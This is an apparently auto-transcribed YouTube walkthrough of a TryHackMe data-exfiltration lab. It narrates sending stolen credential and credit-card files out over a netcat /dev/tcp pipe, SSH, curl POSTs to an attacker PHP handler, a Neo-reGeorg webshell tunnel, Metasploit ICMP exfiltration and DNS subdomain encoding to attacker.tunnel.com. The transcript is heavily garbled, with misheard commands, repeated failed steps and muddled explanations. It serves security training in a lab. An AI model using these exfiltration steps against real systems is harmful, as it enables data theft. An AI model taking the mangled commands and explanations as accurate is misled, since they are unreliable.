Okay guys, welcome to my YouTube video. Is this video for data exfiltration on red teaming? So we are on the red teaming paths and now it's time to using data exfiltration. So first of all, I want to tell you guys what is data exfiltration. You can use exfiltration for thefts. For example, we are on theft on Windows machine or Linux machine, doesn't matter. So we have to be getting data on its server. So we could be exfiltration is over there. So that means our exfiltration is just looking for how can we are getting data on our box. So in this video, we're all gonna use jump box on TryHackMe. If you come over here and start your machine, it's giving us jump box already here. For example, I'm coming in here and just say, for example, ifconfig, because it's running on Ubuntu. Yeah, here, if you can check it, here is giving us the IP address for it. So that means that we have to be working on this IP address. So what we can add now? Yeah, it's giving us this IP address. This network is over here. If you can check it like that. So let me go here, ChatGPT. Alright. For this dream, we have to build network simulation practical scenarios. Where can we perform data exfiltration as tunneling using various network protocols? The provide VM contains two separate networks with multiple clients. We also have a jump box machine that access both networks. The following diagram shows more information about the network environment used in this room. Yeah, it could be like that because we are on the network. Alright, we are an attacker here now and it's giving us for example, here are firewalls and Cloudflare is over there. And there's a firewall using here DNS, and the DNS is could be a local DNS. You have to be know about it. And we have to be jumping here to firewall using this local DNS to jump.tryhackme.com here. But jump.tryhackme.com is using two network here. The network one is equal this IP address, but it could be starting with, for example, 172.20.0.0/24, gathering all sockets on these networks. The another things we have to be working with, this IP address is Ethernet 1 is equal this here, and we could be actually running on is 192 and 168.0.0/24 again, because we have to be look at all sockets on the server. We are working on network. That means that we have to be using scan all the socket and on this network's IP address. So use the network diagram for your reference during the coming task for various protocols. We also set up a domain name TryHackMe.com to make it easier to communicate with the connect within network environments. Check the following table or for more information about the domain names and network access used in this room. So for example, and the jump.tryhackme.com is using this. Alright, is giving off all this IP address is running on, but the uploader.tryhackme.com is using this IP address. It's just a network access to net one, but this if it's giving us like that is access to, you can see it's over there. Jump.tryhackme.com is using network 1 and network 2 is over here. Alright, cool. This is our domain name and this is our domain name IP addresses. One of things here we have to be know about it, flag.tryhackme.com, it's which IP address is running on. We have to be know about it, for example. But how can we check it? Just come over here and try this. Let me say ping flag, yeah, like that, flag.tryhackme.com. Yeah, it's giving us this IP address, but it doesn't work because it's just on local IP addresses over here. but we have to be checking for local IP address on this network because we are working on network. You have to be know about it, what is different from IP address and network IP address. So that means that you can using Pentire, you have to be using this network scan folder all IP address. Now you become a like network pen tester. The first thing you have to be know about it if you're a network pen tester, what is different IP address with the local IP address and the network IP address is over here. So if you can check it here, for example, ifconfig, it's giving us some IP addresses over there. But if you can check it like that, what's my IP here? It's giving us different IP address because this first one is your local IP address is your local IP address, but this one is your public IP address is over here. So okay, now we are deploy the machine and deploy the provide. We are connected with SSH client, deploying attack box or connecting the VPN. Alright, okay. Use the following credential to connect the Jumpbox machine with access to internal networks. Alright, once you are connected Jumpbox machine, you have access both networks. Check the network infrastructure for more information. Lab recommendation: we recommend using the Jumpbox and network environment for the most tasks or TCP, SSH, ISMP and DNS to avoid the technical issues with DNS and networking. However, if you prefer use the attack box for DNS tunneling for task 10, you must change DNS settings at attack box to like this. For more information about changing DNS for attack box, check the DNS configuration as task 8. In most cases, we need to be used two machine established communication. Thus, we need to be 2 or more Linux terminal available to complete this task. Therefore, we recommend using Termux tool for creating multiple over a single SSH login. Alright, let me go SSH because it's recommended for us. I'm gonna say paste here and definitely yes, and give the password TryHackMe. Now we are on the, for example, ifconfig here. This is the same IP address, this is the same machine with this, but we're on the SSH of over here, and then the Jumpbox. It's the same Termux machine, we got it, but it's could be fine here. We just gonna be work it is over there. So now it's time to go data exfiltration. What is data exfiltration and how is it running? Okay, the first of all, let me go up and what is data exfiltration? Data exfiltration is the process of taking unauthorized copy sensitive data and moving them from inside of organization network to outside. It is important to note that data exfiltration was compromised of process where the threat actor has already gained access to network and performed various activities. To get sensitive data, data exfiltration often happens the last stage of cyber kill chain model, action on objectives. Cyber kill chain. What is cyber kill chain? We already know about it before. This is username and password for authentication information and bank accounts to tell business strategy decision and crypto in case employee and personal information, projected code data. But how we get this information? Just go for the recon video at my YouTube channel on red teaming. How to use data exfiltration. We use exfiltrated data and command and control communication and tunnelings. There is a two-stage for how can we read readings. Let's go to first stage to step 1. Alright, this is a traditional data exfiltration. You can use it over here. This is our target. We have to be use this target to data exfiltration to firewall wall, and the attacker had to be connect, I think so, DNS tunneling here, and then the exfiltration has to be connect the same ID here, and this command and control is using for it and tunneling is using for it. You can read over here. In which case scenario will send and receiving traffic continue during a connection? You can if you can read all of things here, you can answer this question is over there. I don't want to be answer this question, I got it before. Let me go for task 4. Exfiltration using TCP sockets. Now we have to be getting some information over here, so it's time to go for using exfiltration on our IP addresses and on our IP stage. This text shows how to exfiltrate data over TCP using data encoding. Using a TCP socket is one of the data exfiltration techniques that an attacker may use in a non-secure environment where they know there are no network-based security products. If you are in a well-secure environment, then things are kind of exfiltration is not recommended. This exfiltration type is easy to detect because we rely on the non-standard protocols. Besides the TCP socket, we will also use various other techniques, including data encoding and archiving. One of the benefits and techniques is encodes data during transmission and make it harder to examine. The following diagram explains how traditional communications over TCP work. If two machines want to communicate, then one of them has to listen and wait for the incoming traffic. It is similar to how the people talk and communicate, where one is listening and other person is speaking. Yep, like that. For example, it's giving us diagram here and how is it running. The first machine is listening over TCP on this port, yeah. The listening on this port. The other machine connects port specified step 1. For example, like the ANCAT 123.41.3.4 in this port, and then the first machine establishes the connection. Finally, the sending or receiving data stores, for example, the attacker sends commands or receives and results is over here. Communication over TCP requires two machines and one victim and attacker machine to transfer data. Let's use our network environment to practice sending data over TCP. To establish communication over TCP, we require two machines. This is first one, victim1.tryhackme.com machine is victim the jump box, and jump.tryhackme is the attacker machine. Now we are on our machine is equal this jump.tryhackme.com, and our victims or target is victim1.tryhackme.com. So we have to be first. We need to prepare a listener on the jump box on what port is specified. In our case, we choose port 8080 here. So okay. Alright, let me go there. Now listen to for ANCA and -NVLP here. Now it's giving us just LVP for 8080 ports using for what? There is a task for creates data here. Alright, just let me say ls-la task for, no, let me use tmp task for, let me go just cd here. Alright, let me go tmp ls-la. There is no, oh, we have to be transferred. Oh, okay, let me go back now. Say cd root, yep, like that, no permission. Alright, let me go home ls and go for TryHackMe. Now it's time to clear, and use this ANCAT-LVLP for using this 8080 port to go for TMP and task for dash credential, not task for dash creates data like that. Okay, now listening on 8080 port here. Now we have to be access to mmap to ssh.tryhackme.com is for it, and go for just 2022 port here. I'm just gonna say yes, and the password is equal to actually here the TryHackMe. Let me. Alright, this is go. Now we are on the actually our target is over here to victim 1. Okay, now it's time to go task 4 here. This is creates the data.txt here, and say cat credential txt. This is us giving us to admin password or admin 123456 and root and tour here. It's giving us some credential information, so we have to be copy this or save it. Now it's time to, I think we don't need to save it because we are gonna be transfer or jump backs here. How can we are doing it? Just using this. So let me go there and say here for tar and ZCF for what task 4. Yep, like that, and say base 64. Just encoding it. I think we have to be encode, right? Yeah, we got it before, we read it before. To dd and environment like abc dictionary and download and developer TCP and use this IP address. Or we're listening on 8080 port here. So connection received with on victim 1 TryHackMe, and let me say ls here, but it's giving us to actually nothing, right? Alright, let me go task 4 for example. There's a creates txt is already here. Alright, let me say creates txt. Yeah, but we actually save it on tmp. Alright, let me say task 4 creates data. It's giving us nothing, right? Alright, cool. And let me say clear here and say lsla one more time. So it's right one readable file is over here. You can check it with like that. So I think it's time to using how can we're running on this port. So okay, it's giving us now to data here, right? Alright, cool. Now we are to do it before do this, and now we have to be executable for this data file. We have to be using what we're using before dd and environment for here. We have to be read this. So if we want to be read this, we have to be using txt, and the txt environment is equal to sci. Yep, like that, and if task for credential data. So let me use base 64 for it and decode it to task that credential tar file. Now we are have now is task and dash credential tar file here. So now it's time to using it like tar x y f to executable this tar file. Let me just use task credential tar file here, and let me say ls. No, why? No, what? Okay. Alright, let me go for TMP. Yep, there's an already here. Now I think we have to execute this file tar xyf for task 4 task to credential tar here. No, it's no, why is no running? Alright, let me say remove task credential tar here. Now we just have to here to this file. Alright, let me say one more time dd environment for executable for it scci like that, and then if it's task for credential data. Now we have to be base64 to decode for it and say task 4 then credential tar file here. Now it's giving us to just 61 bytes copy it. Alright, let me say ls. It's giving here task for credential tar xyf to task 4 credential tar file here. Now it's giving us nothing, but we have already, if you go to TryHackMe, alright, cd home TryHackMe file here, it's giving us already task 4 is over there. We just is using here to transfer this file on our target machines to our victim 1 machine. Let me go task 4 for example and say cat credential txt, and if you're gonna check here cat credential txt here, it's giving us the same idea. Now we have to be using here to transfer this credential file to on our jump box. Alright, exfiltration using TCP relies on the non-standard protocols. Now applied with discovered exported over TCP socket. Once you export data successfully, hit completed, move on the next task. Okay. Now it's time to exfiltration using with SSH. Okay, let me go task 5. And we have to be using here SSH to exfiltration data. So let me say clear it to on my jump box and go for SSH. Okay, in this task we will show how to use SSH protocol to exfiltrate data over an attacking machine. SSH protocol establishes a secure channel on interactive move data between a client and server. So all transmission data is encrypted over network on the internet. So there is an SSH server and we have to be encrypted the communication channel we got it before on TCP and use here SSH clients. To transfer data over the SSH, we can use either secure copy protocol SCP. Do you know any idea for SCP? You can use ChatGPT for it. Do you know SCP? Yes, I'm familiar with secure content protect. We are generally using SCP for transferring file. I think we here with transferring file. So let's assume to gain it access the data must transmit it securely. Let's connect the victim 1 or victim 2 machine. Now we are on victim 1 machine. I think it will be fine. We don't need to go victim 2 machine here. But actually I have no idea how to be connected with victim 2 machine. Now let's go for task 5 here. Alright, let me go back here and go for cd task 45. Let me say ls. Those are giving us credential file one more time. It's giving us the same things. So let me close these tabs, and then you can use it the cat task for credential data like that. Now we have to be actually using here to executable this file to on my jump box. We just have to be using how it's gonna be working on SSH server. We have to be generated with this file to non-executable, and then transfer over to my jumpbox file and executable this file on this jumpbox file. So we have to be actually using here tar again, and let me say clear here, and tar and cv for the task 5. Alright, now we are to non-executable for task 5 file 5 here. Now we have to be connect with which file, which server here. We have to be using SSH to TryHackMe at jump.tryhackme.com, or you can use this IP address. Let me show you. If config, you can use this IP address if you want to be check it, and this IP address is equal to jump.tryhackme.com here, and just come over here to quotation mark and say cd to go for TMP, and I'm using this tar xpf and dash. So let me say enter for it. So are you sure want to continue connected? I'm gonna say yes. Now it's asking us to jump.tryhackme.com's TryHackMe's password. I'm gonna say TryHackMe here, and let me say here, I'm gonna say ls, go back, go to TMP ls. Note there's an task for credential data here. That means that we have no access to giving this any task 5 here. Now that are actually giving it to, we pass it this tar tmp tar xpf. In this case we change the directory ownership to passive files like that. So it's just giving us actually, if you go here cd tmp task 5 here, but there is no task 5. That means if you're gonna be checking task 5, you have to be go try home before here, and ls cd go for TryHackMe, and this is our giving us task 5 here. So we are using here the SSH, the transferring the exfiltration file to with using SSH. So it's time to go ahead and http and https to exfiltrate. Alright, let me go there. So I think as we are here using the it could be fine, and 2 more hardering. I think yeah, it could be 2 harder. Alright, there's an ISMP DNS, and now we have to be using so hard here. So let me go http and https. So I'm gonna to my jump box, say clear here. So go for exfiltrate using http and https. Before going further, ensure you that have the fundamental knowledge of network protocols before diving into tasks and upcoming tasks. This task explains how to use HTTP and HTTPS protocol to exfiltration data from victim and attacker's machine. As requirement for these techniques, an attacker needs to control over a web server with a server-side programming language installed and enabled. We will show a PHP-based scenario on this task, but it can be implemented on another program language, such as Python, Golang, and not JavaScript or extra here. So it's actually giving us a post request for HTTP. Exfiltration data through the HTTP protocol is one of the best options because it's challenging on the DACT. It is tough to distinguish between legitimate and malicious HTTP traffics. We will use post-HTTP method in the data exfiltration and reasons with the GET request. All parameters are registered into the log file. While using post request, it doesn't. The following are some of the post method benefits. Post requests are never cached, and post requests do not remain in the browser history. Post requests cannot be bookmarked. Post requests have no restriction on data lengths like that. Let's log in with web TryHackMe using this credential. Alright, let me go here and say exit to this SSH. Just say SSH TryHackMe to add to web.tryhackme.com. and for password I can what? Oh, we have to be using it on jump box. Okay, let me go first of all to jump box here, SSH TryHackMe at the for jump .tryhackme.com /p using this 2023, but let me say yep like that, and say TryHackMe here. Now it's giving us the victim 1. I don't want to be using victim 1 here. Alright, let me say exit. So we have to be exfiltrating for here or on my attack box. Alright, let me go here and use this SSH on this IP address. TryHackMe. There is no 22 file, I think. No, there's already here. Okay, let's see. Now we are on the okay, we're on the jump box. Alright, that's cool. Now clear it. Okay, now we have to be SSH to TryHackMe web.tryhackme.com. Okay, SSH to TryHackMe at web.tryhackme.com here. I'm gonna say yes, and then password is equal to TryHackMe. I think that yes, we are on the TryHackMe web tryhackme.com. And there is nothing, it's empty to root box. Now yeah, we are giving already here to password, but sudo cat, we had to be sudo this cat, so let me say cat, or let me use sudo the cat for login, log file to Apache to access log here, access the log here. Alright, now I'm start TryHackMe for it. No, it's no such file or directory here. There's no such file or directory here. Access, we have to be using double S here, that's cool, and it's giving us some information about the access.login.com. so it's giving us the flag, for example, here. So let me copy this and go for CyberChef for it. CyberChef, yeah, like that. Alright, it's giving us the password. Oh, TryHackMe is a flag here. Okay, this is, I think, is the first flag, right? Yes, this is the first flag here for the TryHackMe web.com. So we have to be going here flag.tryhackme.com here. So okay, let me go up. So we got it first flag for it, but how can we're using and transfer exfiltration on my jump box, and I'm using it with how come we are using this. Alright, that's cool. That really seems to hard, but it will be cool. Fine. So based on attacker configuration, we can set up either HTTP or HTTPS to encrypt it version of the HTTPS. So we also need a PHP page to handle this post HTTP requests at the server. We will using HTTP protocol, not the HTTPS on our scenario. Now let's assume the attacker controls the web.TryHackMe server. A sensitive must computer jump box or victim one TryHackMe's machine or network to environment like that. So okay. To exfiltrate data over HTTP protocol, we can apply the following steps. The first one. An attacker set us the web server with a data handler. In our case, it will be web.tryhackme.com and the contact PHP page as data handler. A command and control agent on attacker sends data. In our case, we will send data using the curl command, and the web server receives data and stores. In our case, the contact.php receives a post request and stores onto TMP. The attacker logs into web server, have a copy received with data. Okay, this is our steps for the first steps here to using HTTP data exfiltration. Let's follow and apply what we discussed in previous steps. Remember, since we're using HTTP protocol, the data will send clear text. However, we will using other techniques, tar and base64, to change data string format, so it will not be an human readable format. That's right. First, we repeat the web server data handler for this task. The following code snapshot for PHP code to handle post request file stores on the data and TMP directory and HTTP base 64 file name. Alright. Do you have to be using this code? Now from the job machine we have to be using victim1tryhackme.com. Alright, let me go. I'm gonna say exit here. No, exit. Now I think it's using this credential to TryHackMe for password. It's giving us to SSH to the this, so we are on, let me say for example ls-la here. It's giving us some task 4, task 5, task 6 or something like that here. Now we have to be actually using this for all task 6 here. Let me go for example to task 6. It's any file here. Now it's credential txt file is already there. Now let me go back and time to, I think is using this with curl. Alright, let me say curl dash data, and the file, it's gonna be here, tar file, and for using the base 64 for it we have to be using ZCF, and for task 6 file to using space 64, http to web.tryhackme.com to contact PHP, contact.php. We're actually using here the contact.php is already we using this, I think, and so I think it's time to using SSH to go for TryHackMe at web.tryhackme.com to go for and check it. I'm gonna say yes, definitely, and the password is TryHackMe. So now let's go for ls-la to tmp file. Now it's giving us http.base64 file is over there. So let me say cat this tmp and http base64 file. It's giving us some we have to be decoding. So for example, I'm gonna say clear all of things here and go for it. So it's giving us nothing here if you can check it like that, but I think we can, no, like that, definitely here. Let me delete it. So it's giving us nothing one more time. But how can we are actually use this credential to using this? The credential for what? Decoding. So nice. We haven't received the data, but if you look closely, this HTTP base64 file, you can see it's broken base64. Yeah, it does because it's not working. This happens due to URL encoding HTTP. The plus symbol has been replaced with empty space, so let's fix it in set commands as follows, like that. Oh, okay. Well, how this is giving some how can we fix this error? I'm gonna say clear, for example, here, and say sudo, sudo set this file dash I, and then say as to giving here plus for what? Plus for the, yeah, if you can check it here, the empty space, for empty space, that means that we have to be space here and give plus, and for adding this G like that. So yeah, we have to be using like that, but it's not, this could be a single quotation mark. Let me fix it and go for which file we have to be choosing here, TMP and HTTP base64. Now maybe you have to know exactly TryHackMe is this path. You can use ChatGPT. How can I empty space for base64 file to add plus with using set, and it's giving us the set like that. It's giving us the same command to, or you know, I love ChatGPT. I love ChatGPT and I'm generally using for it ChatGPT here. So it's giving us already there. So I'm gonna say enter for it. So password is gonna be say TryHackMe, and then let me say ls, and now let me say cat tmp for HTTP base64. So it's giving us the not space here. Now I think we have to be adding here the base64 for decoding this encode file. So let me use cat tmp HTTP base64 and use it, the base64, decode this, and now it's time to using tar xyzf for executable file here. Now it's giving us task 6 is already there. Let me go task 6 and the cat credential data here. Alright guys, we got this data exfiltration for HTTP protocol and it could be so cool. Now it's time to go for HTTPS communications. So in this previous section we showed how to perform data exfiltration over HTTP protocol, which means all transmitted data and clear tags. One of benefits HTTPS encrypting the transmitted data using SSL keys stored on a server. If you apply the same technique we showed previously on web server with SSL enabled, then we can see that on transmitted data will encrypted. We have a setup or private HTTPS, or let me reconnect it. Server showed that the transmitted the data looks like. If you're interested in setting up the HTTPS server, we suggest visiting DigitalOcean's website here. So as shown in screenshot, we captured the network traffic and it seems that client and server communication on port 4043. Okay. Is there any file, for example, let me go for task cd task. No, there's no cd task 7 here. Oh my god. Because there is no, this is our task 6. Okay, now we have to be install it on our Kali Linux. Okay, I'm gonna be install it, so let me go here to new tab and go for opt ls. Alright guys, let me say git clone and paste it. I'm gonna say ls. Now it's time to go neo-rg here. There's an Python file, we have to be using it. So okay, Python 3, we need to generate encrypted cleaned file upload to victim web server as follows, like that. So alright, let me go here and say Python 3. Oh my god, Python 3 for neo-rg Python file here and generate -chi and TryHackMe for TryHackMe. So it's giving us some credential here. Create the neo-rg server files like neo-rg server tunnel Java secrets packs file, go file and php file here. So for example, if I'm gonna say ls, it's giving us the some things. Neo-rg server is already there, but there is no neo-rg servers before. That means there's a neo-rg servers file is creating here. So let me say neo-rg servers here and say ls. So it's giving us the ktxe, for example. Let me TryHackMe, and I'm giving us some credential file here like tunnel SEX or something like that. So the previous command generates encrypting tunneling cleans with TryHackMe key in the neo-rg server. Note that there are various extensions available, include PHP, SPX, JavaScript file, and extractor. In our scenario, we will uploading a tunnel.php file to the uploader machine. To access the uploader machine, you have to be go there like that. So okay, this is our IP address. Alright, let me go this. Open link in new tab. So it's giving us the upload file here. So now we have to be uploading which file here. To upload the PHP file, use admin as to let you upload the files on uploader.tryhackme.com. Once we have uploaded the file, we can access on the following this URL. So I think here we have to be go file. Okay guys, now it's you know, we are actually using here to upload the PHP file. Use admin as the key. Type proceed. We have to be using admin as the key to upload any files uploader.tryhackme.com. Once have uploaded that file, we can access in the following this URL to tunnel PHP here. So that means I think we have to be go for my tools here and then use here for Python to generate -key.tryhackme, and using the URL is http 10.202 and 56 uploader files, and here we have to be adding your tunnel.php, right? Okay, let me say tunnel.php. So now it's gonna be giving us error for it. Uploader files .tunnel.php. I don't know, we got here all of things is right. So it's not giving us tunnel.php here. Before do this, let me say less and go for neo-rg servers. There's a tunnel.php is already there. Okay, That cool. Alright. Okay, let me say uploader here and browse. I'm gonna go for my Elliot. Now Elliot, go back home. Now home to opt file and NeoRNG and go for here NeoRNG servers. That tunnel PHP is already there. And now I think we have to be using admin and upload this file. The file tunnel PHP has been uploaded. Alright, that's cool, and it's using our to upload it. So let me say do it one more. Now go back and say, for example, using this. So it's giving us the same error to us. Alright, let me copy this. It's giving us the same things or the writable error here. Now, okay. Alright, cool. Now is we have to be curl.sox this file using this to give for here the files. Okay. mp3 replay from server. No, this is not giving us the welcome app server there. So now we have to be actually go for it. So it's giving us nothing in my idea because the curl.sox 5 the HTTP is using like that. So it's not giving us actually to hear the root box now on our attack box. They're all gonna be happening here to using different things. I think we have to be knowing this because we have no idea the administrator shell box. So it's not giving us like that, but app.tryhackme.com. Alright. Now it's not giving us actually mp3 reply from server. So if you're gonna check it, it's giving us the flag TryHackMe.com on this port. Alright, let me go for example here, but it's not gonna be working, I know about it. Flag.tryhackme.com. Alright, here flag.tryhackme.com to go for flag. Now it's not giving us the flag because they're not working for curl. We have to be adding here the curl file on this port, but it's not gonna be working now. The SOX 5 is not working on our machine, so we can install other proxy applications such as proxy chains, Fox proxy, and etc to communicate with the internal network. I don't want to be used the Fox proxy here, and I'm just want to get in the red and go for the tasks 7 here. So, alright, now let me go there and Control C for it. Alright, let me close these tabs and I think let's go for task 7 immediately. And the task 7 is for what? Alright, this isn't giving us ISMP protocol. In this task, we will be showing how to exfiltrate data using ISMP protocol. ISMP stands for Internet Control Message Protocol, and its network layer protocol uses handle error reporting. If you need more information about ISMP and the fundamentals of computer networking, you may visit the following TryHackMe room. What is networking? So we have to be, I think, here to know about it, networking. So let me go for this. Network devices such as routers use ISMP protocol to check network connectivities between devices. Okay, like that. That the ISMP protocol is not transport the protocol send data between devices. Let's say two hosts need to test a connectivity network, then we can use ping commands to ISMP packets throughout the network, as shown in the following figure. For example, here the host 1 is sends ISMP packets to echo request packet. Then if the host 2 availability, it sends ISMP packets with echo reply message confirming availability. One high level to ISMP packet structure contains data section that can include strings of copies of other information, such as the IPv4 header user error message. The following diagram shows the data section, which is optional to use. So we can use actually the here ping for this IP rest-c1 like that. Okay, under TryHackMe's attack box, like here, ping for our IP address, but it's giving us the same IP address to us. To using, so we choose ISMP from host 1 attack box to host 2 target machine using that C1 argument to previous command. Now let's say examine ISMP packet Wireshark and see what data section looks like. So it's, if you can check it here, the Wireshark ISMP is giving us the how can we it's running for data. Okay, let me here just say echo to for TryHackMe credential XXD. No, XXD is why it's not running. XXD will be out to running here. Is there no XXD on my apt install XXD? Alright, now time to running. So it's giving us the credential for the TryHackMe data. So we can use the actually here ping for this IP address 10.10.200 like that, 202.56 -c1 to -p. Give this, so it's giving us the same credential data for it. And how is the ISMP protocols running on. So we have actually now some idea about the ISMP protocol. I think it's time to go data exfiltration for ISMP protocols. So we have to be using MSF console here. Okay. And this jump box I think we have to be using. For example, I'm gonna say MSF console, it's running here. Command not found here. There is no MSF console on our jump box, but we have to be interfaces for ATC0. Now ATC0 here. Alright, let me say do a new tab, MSF console. Search for ISMP Exfiltration. Here, let me say U0. Now I think it's time to set. No, but before do this, I'm gonna say show options. Now we have to be using BPF filter here. Set BPF filter here, ISMP, and not source or attack box IP, and we have to be giving here to which attacker Wi-Fi here. Let me say 10.8.72.217 before, and set interface for here. The name of the interface ET is 0 here. Now let me say run. Now it's giving us nothing. We have to be adding here the jump box idea here. Not source for, I'm gonna stand 10.202 and 56. As for interface, I'm gonna use here to ifconfig. Now it's giving us ET0 is equal this. So let me just here to say 172.20.0.2 here. So let me say run this. Now it's giving us the same error to us. So we have to be SSH here to go for ismp.tryhackme.com. Now it's time to, I think, go for exits. Exit to us one more time. To running for jump box, I'm gonna use this, and I say here SSH to go for TryHackMe at ismp.tryhackme.com. I'm gonna say definitely yes. For password, I'm gonna use TryHackMe. I'm gonna say run. Okay. Alright. TryHackMe. Now I'm gonna say clear. It's giving us ISMP host here. Alright, let me use the MSF console for example for it, but it's giving us the same error to us. I think I know it with command not found. Now it's giving us ISMP protocol here, so why is running like this? Oh, it's giving us the here. Oh my god. For example, let me use this to on my sudo. Now it's giving us the attack box IP here. Yeah, it will be sent this attack box IP, that's right, and then the attack box IP is sending this IP address to echo reply here. So there's one IP address ping it, right? Yes, that's true. Now we have to be at this, the admin password credential we got it before on the task 3. I'm gonna use paste it, but we have to be change the attack box IP there. Now let me use 10.8.72.270 here. So it's giving us the same result there what we are getting before. And now I think it's time to running for the admin 2. We're giving password to password 2 here. Let me use this. Now it's giving us the same result to us. What we're doing here, we have to be using here to with the data strings to eof. Alright, one more time to go for attack box IP2. Now it's giving us always the same result to us. So when we get the run here, it's giving us the same file txt here, and it's giving us the flag, I think, here, right? Yes. So the time to come over here. Alright, let me try this to my box. To my jump box we have to be giving here. Oh really? Alright, let me see it. Now it's time to rating for us. I'm gonna use for sudo ismp dash connection to dash I for eth1 dash d. Now like I'm gonna use TryHackMe for password. No, it's giving us a shell. We have to be say here the host name. Now it's shell giving us ISMP host. So what are the confirmed communications? Auto ISMP protocol, we capture the network traffic during the communication using TSMP dump as the following here. Once the gap flag command is executed, check tmp. Now we have to be doing what? Now let me say Control C here and let me go for the CDTS. No, nothing here. Let me go back. The shell for using word for gap flag is giving us a flag, right? That's right. So okay. Let me use the Control C for it. So I'm gonna say clear. Now time to go task A. What is there about the task A? The TryHackMe is DNS changer. And using here the DNS changer with like this. Okay, it's giving us how can we are running for it. Okay. Okay guys, you can watch this video for getting this answer. There's already video here. There's nothing I have to be teach about you. Now I think exfiltration over DNS is just giving us how can is DNS is working, but we have to be adding here too. I think it could be fine for us. Now I'm just gonna say exit for it. I'm gonna say clear and say here nano etc and NAT plan. Is there a NAT plan? No. I think we have to be root attack box here. Alright, let me say the Control C for it. Is there in front of my jump box? Yes. I'm just gonna show split weave here and say cd code for etc ls. Is there a NAT plan? There's no. Okay, now it's exfiltration over DNS here. Oh my god. Okay. Okay, it's time to using exfiltration over DNS. So DNS is the most important things for exfiltration. The first one is using with this HTTP, and the second one over to here using for DNS. So you have to be checked for DNS and HTTP. So it could be defined for you as you know for you I think. So what is DNS data exfiltration? Since DNS does not transport protocol, many organizations don't regularly monitor DNS protocol. The DNS protocol is allowed almost firewalls and organization network. For those reasons, threat actors prefer using DNS protocol hide their communications. The DNS protocol has limitations that need to be taken into consideration, which are as follows. The maximum length of the fully qualified FQD and domain name is like that, and like 25 characters here. So there is an attacker, and the internet is using this, the firewall. You know, there's a DNS server is local, DNS server is working here. Now we have to be tunneling for this, then the firewall, this DNS allowed, and get this attack. So the first one, attacker registered domain name, for example, tunnel.com. The second one, the attacker sets up tunnel.com and has record points of the server that attacker controls. The malware of the attacker sends sensitive data from machine domain that they control, for example, password.tunnel.com, where password data needs to be transferred. The DNS request is sent through DNS server and forwarded through the internet. The attacker's authoritative DNS malicious server tries the DNS request. Finally, the attacker extracts the password from the domain name. When do we need to use DNS data exfiltration? These are many use case scenarios, but the typical ones of the when a firewall blocks, filter, and traffics. We can paste data or TCP, UDP packets to firewall using DNS protocol. But it's important to ensure that with a DNS allowed resolving domain names and IP address. So modifying DNS records, how can we are modifying? Now let's try to perform DNS data exfiltrations provide network environments. Now we will be using tunnel.com domain name, and in the scenario we also provide the web interface to modifying DNS records of tunnel.com in our name server. The points our attack box machine ensure to complete these settings in this task 8. So let me go task 8. Okay. Alright. So I think we have to be using the here. Let me go if there's any. Now let me say for it. I'm just gonna say exit here. Now if we are on the jump box, if you can check it here. Now I think we have to be connection to attack box on this. Let me say TryHackMe and say here attacker.tryhackme.com. I'm gonna say yes, and the password is actually equal to here TryHackMe. And now we are in the attacker file. If you can check it like that. So on the from attack bus machine using this for going for attacker SSH, you have to be using so this one or this one on your connection with the attacker box. So I think we have to be go to TryHackMe attacker here and the sudo tcp dump-i80 udp port 53-v here. So let me go for my attacker shell here and say sudo tcp dump and -i80 and udp port 453-v like that. Okay, for password let me use this here to TryHackMe. Now we're listening the on 80 link tab is like that. So I think we have to be going here one more time to SSH for TryHackMe. What we're doing before for jump box, I'm gonna use SSH TryHackMe at here to come over here and copy this and say paste. No, what? What's the matter with you? Now it's time to go for it and say to TryHackMe for password one more time. Now we are in the jump box. We have to go jump box here. So now we are on this port, in this UDP port we're listening on. Now if we have to go for victim 2 here, let me say SSH TryHackMe, go for victim 2.tryhackme.com. Let me say yes, and for password TryHackMe. Last is over there. We are on this TryHackMe's password here. So now we have to add here the task for credential data here. For example, I'm gonna say task 9 and go for credit.txt here. It's giving us the name is TryHackMe, user and address is over there. Credit card number and X-Pro and the code is over here. So we have to be exfiltration for on our attacker box. So let me say for it, I'm just gonna use cat task 9 credit txt one more time. Just come here and grab for use base 64, and it's giving us some information about how can we use it base 64 encoding. So we have to be using the people that actually is the public non-writable and readable for it, because we have to be using here tar and base 64 encoding on this information. So that means that we got it before, we have to be using this, or tunnel.com is how can we are using like that. So now that we have the base 64 representation, we need to be split it on our multiple DNS. DNS request depending on its outpost length DNS mutation and attached subdomain name here. Let's show the both ways of strings, starting with splitting multiple DNS requests. We have to be using this cats and do it base 64 one more time, and we have to be getting here the public is non-writable and readable for it, but that that means we have to be using here tar executable tool. So let me say tar for it and add here -d, and I'm using for it let me add in here quotation mark with just giving here to be and column file like that -n. Now we have to be add here fault for giving -v -w80 here, and now I think we have to be adding sat for to reading and writable for it. So I'm gonna use sat-r for it. We have to be adding the dash words, we have to be using some single quotation mark, and now we have to be adding s. So now we have to be actually here add here dot. That means that we have to be add here dot, and I'm say with giving this. So let me go for one more slash here. That means that it's giving some all stuff giving the dot value is over here. So that means that it could be fine. I'm gonna use and here and dot add tunnel .com like that. So I'm gonna slash one more time. It's giving us this now like the dash n. Oh my god. Slash n. Oh my god, it's not giving us nothing. Oh, we have to be not using tar, we have to be using here tr like that. So it's giving us to know for giving it's we have to be using here to add, not add, we have to be using here to and here. So it's giving us the with encoding file to writable and non-writable and non-readable here. Now we have to be adding here to on my attack box and just delete it, and time to read as confirmation. So let me go down for it. So we have to be using this to attacker file like that. So what we're doing here, fault, okay, -c tar -dn like that. Alright, Now we have to be adding it to time. It's not giving sense the column, that's the same column for it. So let me use one more time it. So we have to be adding cat task9 credit.txt. Now you know we are on this to giving us base 64. Not like that. Alright, so I think we're adding here cat task9 credit.txt here and giving it for base 64 on it, and I'm at here tr-d and giving quotation mark with backslash on an. Now we are on the have to be adding here fold for -v 18 here. Yep, like that. Now we have to be grab it one more time, set for single quotation mark, giving the dot value for it, but all of things that means that we have to be actually multiply, and I'm at here to and giving the dot one more time. We have to be using slash for all value on that, so we have to be using grab one more time and giving tr for -d and I'm using the backslash for and. So I think we have to be coming here and say now set for as to add here to all callbacks for attack. Now add attacker.tunnel.com. It's gonna be anything we have to be adding here. Let me check it. I think there's no. I'm gonna use the slash one more time. Command now fine. Okay, let me go there and just change it with base 64. Now it's giving us the what we are actually sending my attacker box. So why are we doing it? Because this is non-writable and readable for the DNS recovery. So okay, that's fine. So I think we have to be using here that one more time to cat tr the attachment like that, set at tunnel.com is spring short bash. Okay, let me use it. I'm just gonna not clear it. So okay, we have to be using it cat task9 to credit cards the value for it. I'm just gonna use one more time to base 64. Now we have to be using to tr-d same things backslash and 